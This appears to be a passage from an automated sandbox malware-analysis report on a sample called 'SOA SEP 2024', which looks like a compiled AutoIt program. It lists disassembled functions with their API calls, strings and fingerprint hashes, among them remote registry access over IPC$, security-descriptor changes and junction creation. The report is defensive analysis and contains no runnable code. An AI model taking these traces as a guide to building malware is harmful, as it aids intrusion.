Instruction Fuzzy Hash: 16416172800208FACB15FBD0DD8ADEEB77CAF55340F100165BA06B6092EA796F49DB61

Function 007AD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007AD0D8
__swprintf.LIBCMT ref: 007AD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 007AD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007AD15C
_memset.LIBCMT ref: 007AD17B
_wcsncpy.LIBCMT ref: 007AD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007AD1EC
CloseHandle.KERNEL32(00000000), ref: 007AD1F7
RemoveDirectoryW.KERNEL32(?), ref: 007AD200
CloseHandle.KERNEL32(00000000), ref: 007AD20A

Strings

\, xrefs: 007AD110
:, xrefs: 007AD11B
\??\%s, xrefs: 007AD0F4

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: a18ae9cefcec112dde49ddb9b82ff7d0a0ea8c7f4c959f7c911d07e21816d64d
Instruction ID: 0e7134ef1b10571a800c3a8367f7b9b4527e2d0ce11b59bc98b5d39015208d4a
Opcode Fuzzy Hash: a18ae9cefcec112dde49ddb9b82ff7d0a0ea8c7f4c959f7c911d07e21816d64d
Instruction Fuzzy Hash: 0A3193B2500149ABDB31DFA0CC49FEB37BCEF89740F1041B5F509D61A0E7789A458B24

Function 007CE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007CBEF4,?,?), ref: 007CE754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007CBEF4,?,?,00000000,?), ref: 007CE76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007CBEF4,?,?,00000000,?), ref: 007CE776
CloseHandle.KERNEL32(00000000,?,?,?,?,007CBEF4,?,?,00000000,?), ref: 007CE783
GlobalLock.KERNEL32(00000000), ref: 007CE78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007CBEF4,?,?,00000000,?), ref: 007CE79B
GlobalUnlock.KERNEL32(00000000), ref: 007CE7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,007CBEF4,?,?,00000000,?), ref: 007CE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007CBEF4,?,?,00000000,?), ref: 007CE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,007ED9BC,?), ref: 007CE7D5
GlobalFree.KERNEL32(00000000), ref: 007CE7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 007CE809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007CE834
DeleteObject.GDI32(00000000), ref: 007CE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007CE872

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 40fdcec4ab3b0446bf0c047e8dcb9d68be4d4731af69b788838e849d3a451427
Instruction ID: 21f0454a779f93a1f326b10f5c555e82198449359758cc2982accb11a61f4a24
Opcode Fuzzy Hash: 40fdcec4ab3b0446bf0c047e8dcb9d68be4d4731af69b788838e849d3a451427
Instruction Fuzzy Hash: 4A412775601248EFDB219F65DC88EAA7BBCFB89715F108058F906DB2A0D739AD41DB20

Function 007B05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 007B076F
_wcscat.LIBCMT ref: 007B0787
_wcscat.LIBCMT ref: 007B0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 007B07C2
GetFileAttributesW.KERNEL32(?), ref: 007B07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 007B07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 007B0806

Strings

*.*, xrefs: 007B0845

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: df5b31e658e2ba162368dca3c4d8dc1e3bddd3491b07a4487856a01a1d2f20b7
Instruction ID: 3811edcf749c2e76e6852ceb8bf26a6dccc42b3e4d897ce2a0b2d50f76cce321
Opcode Fuzzy Hash: df5b31e658e2ba162368dca3c4d8dc1e3bddd3491b07a4487856a01a1d2f20b7
Instruction Fuzzy Hash: 70817171504345DFCB24EF24C845AAFB7E8BBD8344F14882EF889D7251EA38E9558BD2

Function 007CEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007CEF3B
GetFocus.USER32 ref: 007CEF4B
GetDlgCtrlID.USER32(00000000), ref: 007CEF56
_memset.LIBCMT ref: 007CF081
GetMenuItemInfoW.USER32 ref: 007CF0AC
GetMenuItemCount.USER32(00000000), ref: 007CF0CC
GetMenuItemID.USER32(?,00000000), ref: 007CF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 007CF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 007CF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007CF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007CF1C8

Strings

0, xrefs: 007CF079

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: e93045e5273a813a8ef693b97099b9ecffd75d81a09e38b91360498d838deb28
Instruction ID: 24a804faa8df815df845bd98be1bae1bf18c951ce050a17d54faf898236f0da3
Opcode Fuzzy Hash: e93045e5273a813a8ef693b97099b9ecffd75d81a09e38b91360498d838deb28
Instruction Fuzzy Hash: 7F818B70605345EFDB20CF14C888EABBBEAFB88314F14452EF99897291D738D945CB92

Function 0079A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0079ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079ABD7
Part of subcall function 0079ABBB: GetLastError.KERNEL32(?,0079A69F,?,?,?), ref: 0079ABE1
Part of subcall function 0079ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0079A69F,?,?,?), ref: 0079ABF0
Part of subcall function 0079ABBB: HeapAlloc.KERNEL32(00000000,?,0079A69F,?,?,?), ref: 0079ABF7
Part of subcall function 0079ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079AC0E

Part of subcall function 0079AC56: GetProcessHeap.KERNEL32(00000008,0079A6B5,00000000,00000000,?,0079A6B5,?), ref: 0079AC62
Part of subcall function 0079AC56: HeapAlloc.KERNEL32(00000000,?,0079A6B5,?), ref: 0079AC69
Part of subcall function 0079AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0079A6B5,?), ref: 0079AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079A8CB
_memset.LIBCMT ref: 0079A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079A8FF
GetLengthSid.ADVAPI32(?), ref: 0079A910
GetAce.ADVAPI32(?,00000000,?), ref: 0079A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0079A969
GetLengthSid.ADVAPI32(?), ref: 0079A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0079A995
HeapAlloc.KERNEL32(00000000), ref: 0079A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079A9BD
CopySid.ADVAPI32(00000000), ref: 0079A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0079AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079AA2F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1d6ff9a092baa3dacd03e11fbdc40e394f72ff76afce3da9b43f7cdb4b43df3c
Instruction ID: f7043a012e48c3078563ee14005ca7db2b1f8162961ba09587fa0ac1f21a03fd
Opcode Fuzzy Hash: 1d6ff9a092baa3dacd03e11fbdc40e394f72ff76afce3da9b43f7cdb4b43df3c
Instruction Fuzzy Hash: 76511EB1901149BFDF10DF94ED89AEEBB79FF08310F048119F915AA290DB399A05CBA1

Function 007ACC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 007ACCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 007ACCC5
__swprintf.LIBCMT ref: 007ACD1E
__swprintf.LIBCMT ref: 007ACD37
_wprintf.LIBCMT ref: 007ACDED
_wprintf.LIBCMT ref: 007ACE0B

Strings

"%s" (%d) : ==> %s:, xrefs: 007ACE06
"%s" (%d) : ==> %s:%s%s, xrefs: 007ACDE8
Error: , xrefs: 007ACDB5
^ ERROR, xrefs: 007ACD8F
Line %d (File "%s"):, xrefs: 007ACD18, 007ACD31

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 797a30e096da916117ef09644a4b8f51cca61a5a0f23829d842764b22b003d1f
Instruction ID: 1202a7c0589271244924b51264f87b4cc067b1a3e29c2e4c3c4a7e4f768901a0
Opcode Fuzzy Hash: 797a30e096da916117ef09644a4b8f51cca61a5a0f23829d842764b22b003d1f
Instruction Fuzzy Hash: 80515C71900509FACF16EBA0CD4AEEEB778AF09300F104165F906721A2EB796F59DF61

Function 007ACA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007ACA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007ACAB0
__swprintf.LIBCMT ref: 007ACB09
__swprintf.LIBCMT ref: 007ACB22
_wprintf.LIBCMT ref: 007ACBCD
_wprintf.LIBCMT ref: 007ACBEB

Strings

"%s" (%d) : ==> %s:, xrefs: 007ACBE6
"%s" (%d) : ==> %s:%s%s, xrefs: 007ACBC8
Error: , xrefs: 007ACB95
^ ERROR , xrefs: 007ACB64
Line %d (File "%s"):, xrefs: 007ACB03, 007ACB1C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 377bb57295b18a4d9add3e8aea537381745d99c498a1418d560d35513918183b
Instruction ID: 779318ee7279ecf0c7cc75e5f295bf4d2c0e1cc4f400457c6c274001f68cbdc6
Opcode Fuzzy Hash: 377bb57295b18a4d9add3e8aea537381745d99c498a1418d560d35513918183b
Instruction Fuzzy Hash: AF519F71900109FACF26EBE0CD4AEEEB778AF05300F104165B90A72152EB796F59DF61

Function 007A55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007A5664
GetMenuItemCount.USER32(00821708), ref: 007A56ED
DeleteMenu.USER32(00821708,00000005,00000000,000000F5,?,?), ref: 007A577D
DeleteMenu.USER32(00821708,00000004,00000000), ref: 007A5785
DeleteMenu.USER32(00821708,00000006,00000000), ref: 007A578D
DeleteMenu.USER32(00821708,00000003,00000000), ref: 007A5795
GetMenuItemCount.USER32(00821708), ref: 007A579D
SetMenuItemInfoW.USER32(00821708,00000004,00000000,00000030), ref: 007A57D3
GetCursorPos.USER32(?), ref: 007A57DD
SetForegroundWindow.USER32(00000000), ref: 007A57E6
TrackPopupMenuEx.USER32(00821708,00000000,?,00000000,00000000,00000000), ref: 007A57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007A5805

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 1f30eecec40faabaac02f5f888f2534d3754838ee5ecb8b4a54df9a6d4178ad6
Instruction ID: b7a47366028b0a497fbb11eead75ab59ef37775659940976a044d483e00d1044
Opcode Fuzzy Hash: 1f30eecec40faabaac02f5f888f2534d3754838ee5ecb8b4a54df9a6d4178ad6
Instruction Fuzzy Hash: 63713370641A05FEEB209F14CC89FAABF65FF86764F244305F6146A1D0C7B95C10DB94

Function 0079A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0079A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0079A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0079A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0079A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0079A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079A2AB

Strings

\IPC$, xrefs: 0079A1F3
SOFTWARE\Classes\, xrefs: 0079A17D
\CLSID, xrefs: 0079A193

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: d5998f00f0bb98f523dbab6f907016791c6594c23bf41cbb8e6f4293df9e4485
Instruction ID: 4dc646a9cf9b43958da5161f74c4f36e50e0a7e2dce885ea788ca6ec868a2da1
Opcode Fuzzy Hash: d5998f00f0bb98f523dbab6f907016791c6594c23bf41cbb8e6f4293df9e4485
Instruction Fuzzy Hash: 8841F776C11229EACF25EBA4DC85DEDB778FF08310F044129E806B7161EB789E05CB91

Function 007C3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2BB5,?,?), ref: 007C3C1D

Strings

HKCR, xrefs: 007C3CAB
HKCU, xrefs: 007C3CF3
HKU, xrefs: 007C3D15
HKCC, xrefs: 007C3CD1
HKEY_USERS, xrefs: 007C3D04
HKEY_CLASSES_ROOT, xrefs: 007C3C96
HKEY_CURRENT_CONFIG, xrefs: 007C3CC0
HKEY_LOCAL_MACHINE, xrefs: 007C3C6C
HKLM, xrefs: 007C3C81
HKEY_CURRENT_USER, xrefs: 007C3CE2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 36c0770759436ebe73ce7ed5c8d382edcf70b7b5544a924fc9c5dc8956053630
Instruction ID: 1e0792a66c7c13c392522e5087c2a3fad38640758691524abfc7f9b9e08e29d6
Opcode Fuzzy Hash: 36c0770759436ebe73ce7ed5c8d382edcf70b7b5544a924fc9c5dc8956053630
Instruction Fuzzy Hash: 7941607420024ACBDF01EF50D845EEA3729FF16340F10886CFC5A5B192EB78AE5ACB20

Function 007A25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007D36F4,00000010,?,Bad directive syntax error,007FDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007A25D6
LoadStringW.USER32(00000000,?,007D36F4,00000010), ref: 007A25DD
_wprintf.LIBCMT ref: 007A2610
__swprintf.LIBCMT ref: 007A2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007A26A1

Strings

., xrefs: 007A2687
%s (%d) : ==> %s.: %s %s, xrefs: 007A260B
Line %d:, xrefs: 007A262C
Error: , xrefs: 007A266F
Line %d (File "%s"):, xrefs: 007A2647

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 6a1fa568f4b3f3872369286d0ea0ce533441507546894c2f209c7b4a583f34c2
Instruction ID: 54f63d444eec76c576fe4672671ba290d5f998ece9d4040cc6e75dda7678db72
Opcode Fuzzy Hash: 6a1fa568f4b3f3872369286d0ea0ce533441507546894c2f209c7b4a583f34c2
Instruction Fuzzy Hash: 2F216D3190021EEFCF12BB90CC4AEEE7739FF19304F004455F916A61A2DA79AA55DB51

Function 007A7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007A7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007A7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007A7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007A7B8C

Strings

play PlayMe, xrefs: 007A7B87
close PlayMe, xrefs: 007A7B53, 007A7B80
open , xrefs: 007A7AF1
alias PlayMe, xrefs: 007A7B1B
play PlayMe wait, xrefs: 007A7B76
status PlayMe mode, xrefs: 007A7B3D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 3c86b076948bf1b8a3536e16efcd15493fa8472efb6807f5d04b6204201f2419
Instruction ID: a573af4ae2ee1d4ac0ec8a93162a114fcd67719cb4c72c92dafbf44eb69090b5
Opcode Fuzzy Hash: 3c86b076948bf1b8a3536e16efcd15493fa8472efb6807f5d04b6204201f2419
Instruction Fuzzy Hash: CB1182E1A50269B9D724A761CC4ADFF7A7CEFD2B10F0009297822E61D1DA681E85C6B1

Function 007A778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007A7794

Part of subcall function 0077DC38: timeGetTime.WINMM(?,75A8B400,007D58AB), ref: 0077DC3C

Sleep.KERNEL32(0000000A), ref: 007A77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007A77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007A7806
SetActiveWindow.USER32 ref: 007A7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007A7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 007A7852
Sleep.KERNEL32(000000FA), ref: 007A785D
IsWindow.USER32 ref: 007A7869
EndDialog.USER32(00000000), ref: 007A787A

Strings

BUTTON, xrefs: 007A77F8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: dcc09b81df4fd3c6022d598e01e852ab37c9b167aff934d5f6714d4092e04888
Instruction ID: 46e564a466471ad1ab62a0822a2911d995abae436bbd19b28eec071f85643c8e
Opcode Fuzzy Hash: dcc09b81df4fd3c6022d598e01e852ab37c9b167aff934d5f6714d4092e04888
